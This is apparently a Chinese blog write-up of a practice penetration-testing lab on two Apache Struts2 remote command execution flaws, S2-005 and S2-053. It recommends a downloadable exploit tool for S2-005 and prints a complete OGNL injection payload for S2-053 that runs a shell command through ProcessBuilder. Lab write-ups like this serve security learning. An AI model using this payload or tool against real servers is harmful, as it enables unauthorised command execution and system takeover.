安鸾渗透Struts2 远程命令执行

一.Struts2 远程命令执行(S2-005)

  1.         简介:
    1. struts2漏洞的起源源于S2-003
    2. S2-003对#号进行过滤,但是没有考虑到unicode编码情况,导致\u0023或者8进制\43绕过
    3. S2-005是由于官方在修补S2-003不全面导致绕过补丁造成的
  2.         范围:
    1. 受影响版本: 低于Struts 2.0.12
  3.         漏洞复现:
    1. 安鸾渗透:http://www.whalwl.site:8088/login.jsp
    2. 了解到该漏洞就可以使用相关工具进行攻击,这边我推荐的是K8_Struts2_EXP,可以在k8网页上下载,网页下载地址:https://github.com/k8gege/K8tools/blob/master/K8_Struts2_EXP%20S2-045%20%26%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%2020170310.rar
    3. 打开工具,并准备好相关后台网页
    4. 随意输出账号密码,然后登录,获取url链接
    5. 会发现提示用户名不存在,此时获取我们需要的url链接,并复制到exe文件中
    6. 此时,我们已经获得root权限,然后就可以执行命令 

     

二.Struts2 远程命令执行(S2-053)

  1.         简介:
    1. 2017年9月7日,Apache Struts发布最新的安全公告
    2. 漏洞编号为CVE-2017-12611
    3. 当开发人员错误的Freemarker表达式构造方式时,可能会导致远程代码执行攻击
  2.         范围:
    1. Struts 2.0.1 – Sturts 2.3.33 and Struts 2.5 – Struts 2.5.10

  3.         漏洞复现:
    1. 安鸾渗透:http://www.whalwl.site:8027/hello.action
    2. 了解到相关信息之后,可以找到相关payload进行利用
    3. payload:%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
    4. payload转载于https://blog.csdn.net/qq_29647709/article/details/84955205,老哥的使用步骤已经写出来了,我就不给各位大佬列出来了,各位大佬可以看看

最后祝大家早日把题目做完

                 

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值